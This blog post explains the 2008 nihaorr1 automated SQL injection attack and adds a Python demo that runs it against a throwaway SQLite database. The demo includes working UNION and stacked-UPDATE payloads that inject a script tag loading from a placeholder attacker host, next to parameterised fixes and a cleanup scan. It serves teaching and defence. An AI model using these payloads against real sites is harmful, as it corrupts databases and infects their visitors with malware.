Tuesday, 29 April 2008

nihaorr1 attack explained

I went and introduced myself to the guys at Secerno again at InfoSec last week, and whilst I have no professional affiliation with them, I'm always interested in exciting technology which does something new. Steve Moyle, CTO, is a friendly guy who oozes enthusiasm, just as Paul Galwas was when I met him last year. I just got a mail from Steve to tell me about a recent attack, and I thought it was so well explained I offered to reproduce it here. Steve agreed, so here goes:

"The nihaorr1 attack trashed web facing databases all over the planet last week. It was based on an automated SQL Injection attack (Secerno stops these). Previous attacks like this were targeted and individual. It was only a matter of time before someone sinister worked out how to automate it. We were working with a victim not long after the outbreak.

In this attack, they were not stealing data. However, for the affected web sites it would be difficult for anyone claiming PCI compliance to show that they had their data under control. The attack can easily be rewritten to take integer values (e.g. credit card numbers) from one field (say) and copy them to a text field, and then expose them on web pages ...

Basically, the attack worked as follows:

Step 1: potentially vulnerable sites identified automatically (probably by a Google query)

Step 2: SQL Injection part 1. SQL injection at a site to ask the database for every field it has that contains text

Step 3: SQL Injection part 2. Update every text item in the database with the original item plus a link that will download a trojan to the web browser

Now what happens is that when a web site serves up a page, the text it serves up is called up from its database -- but every piece of text now has a malicious link under it. When clicked on, the link serves up a virus that infects the viewer of the web page.

Note that the original victim -- the web site -- has become the attacker, whilst the new victim is the website visitor who trusts the site.

This attack will be adapted and will cause real chaos."

Thanks, Steve, for the entertaining story and explanation of how this attack is working. And, as the Romans say, caveat emptor internettus.
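Steps 2 and 3 of the attack Steve describes, played out end to end against a throwaway SQLite database, with the same payloads then thrown at parameterised versions of the page handlers. This is an added example written for this page; it is not code from Steve, from Secerno or from the original post, and Step 1 (finding sites) is left out. It assumes a SQLite schema (the post does not say which database engine the victims ran), two constructed legacy-style page handlers that paste querystring input into SQL, and a placeholder attacker host `attacker.invalid`; the post names none of these.

```python
import sqlite3

# Constructed placeholder: the post says only that the appended link fetched a
# trojan into the visitor's browser, and names no host or markup.
MALICIOUS_LINK = '<script src="http://attacker.invalid/1.js"></script>'


def build_db():
    """Constructed sample site database: text columns mixed with numeric ones."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL, blurb TEXT);
        CREATE TABLE news (id INTEGER PRIMARY KEY, headline TEXT, body TEXT, hits INTEGER);
        INSERT INTO products VALUES (1, 'Widget', 9.99, 'A fine widget');
        INSERT INTO products VALUES (2, 'Gadget', 19.99, 'A finer gadget');
        INSERT INTO news VALUES (1, 'Site launched', 'Welcome to our shop.', 0);
    """)
    return db


# --- Vulnerable handlers (assumed legacy pattern: user input pasted into SQL) ---
def product_page_vulnerable(db, product_id):
    """Read endpoint. A UNION payload pulls the schema catalog back out (Step 2)."""
    return db.execute("SELECT name, blurb FROM products WHERE id = " + product_id).fetchall()


def count_hit_vulnerable(db, headline):
    """Write endpoint run as a script, so a ';'-stacked UPDATE executes (Step 3)."""
    db.executescript("UPDATE news SET hits = hits + 1 WHERE headline = '" + headline + "'")


# --- Hardened handlers: the same queries with bound parameters ---
def product_page_safe(db, product_id):
    return db.execute("SELECT name, blurb FROM products WHERE id = ?", (product_id,)).fetchall()


def count_hit_safe(db, headline):
    db.execute("UPDATE news SET hits = hits + 1 WHERE headline = ?", (headline,))


# --- The attacker's side of Steps 2 and 3 ---
def step2_enumerate_text_columns(fetch):
    """Step 2: ask the database, through the read endpoint, for every text column.
    SQLite keeps the CREATE TABLE text in sqlite_master; column types are parsed from it."""
    rows = fetch("0 UNION SELECT name, sql FROM sqlite_master WHERE type = 'table'")
    targets = []
    for table, ddl in rows:
        for coldef in ddl[ddl.index("(") + 1:ddl.rindex(")")].split(","):
            name, coltype = coldef.split()[:2]
            if coltype.upper() == "TEXT":
                targets.append((table, name))
    return targets


def step3_poison(inject, targets):
    """Step 3: append the link to every value of every text column found."""
    for table, col in targets:
        inject(f"x'; UPDATE {table} SET {col} = {col} || '{MALICIOUS_LINK}'; -- ")


# --- Defender's check: how many stored values now carry the link? ---
def find_poisoned_values(db):
    """Walk the catalog directly (identifiers come from PRAGMA, not from users)."""
    count = 0
    for (table,) in db.execute("SELECT name FROM sqlite_master WHERE type = 'table'"):
        for _cid, col, coltype, *_rest in db.execute(f"PRAGMA table_info({table})"):
            if coltype.upper() == "TEXT":
                count += db.execute(
                    f"SELECT count(*) FROM {table} WHERE instr({col}, ?) > 0",
                    (MALICIOUS_LINK,)).fetchone()[0]
    return count


def demo_vulnerable():
    """Run Steps 2 and 3 against the vulnerable handlers on a fresh database."""
    db = build_db()
    targets = step2_enumerate_text_columns(lambda p: product_page_vulnerable(db, p))
    step3_poison(lambda p: count_hit_vulnerable(db, p), targets)
    # The site now serves the attacker's markup under every piece of text.
    return sorted(targets), find_poisoned_values(db), product_page_vulnerable(db, "1")


def demo_hardened():
    """Same payloads against the parameterised handlers: both steps come back empty."""
    db = build_db()
    targets = step2_enumerate_text_columns(lambda p: product_page_safe(db, p))
    # Even with a column list learned elsewhere, the stacked UPDATE is now just a
    # headline value that matches no row.
    step3_poison(lambda p: count_hit_safe(db, p), [("products", "name"), ("news", "body")])
    return len(targets), find_poisoned_values(db)


if __name__ == "__main__":
    print(demo_vulnerable())
    print(demo_hardened())
```

The read endpoint is what makes Step 2 possible (the catalog comes back in the product listing), and the write endpoint's willingness to run stacked statements is what makes Step 3 possible; fixing either one blocks the chain, and binding parameters fixes both without touching the schema. `find_poisoned_values` is the check a site owner would run after an outbreak like this, scanning every text column for the injected markup rather than trusting the pages to look clean.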
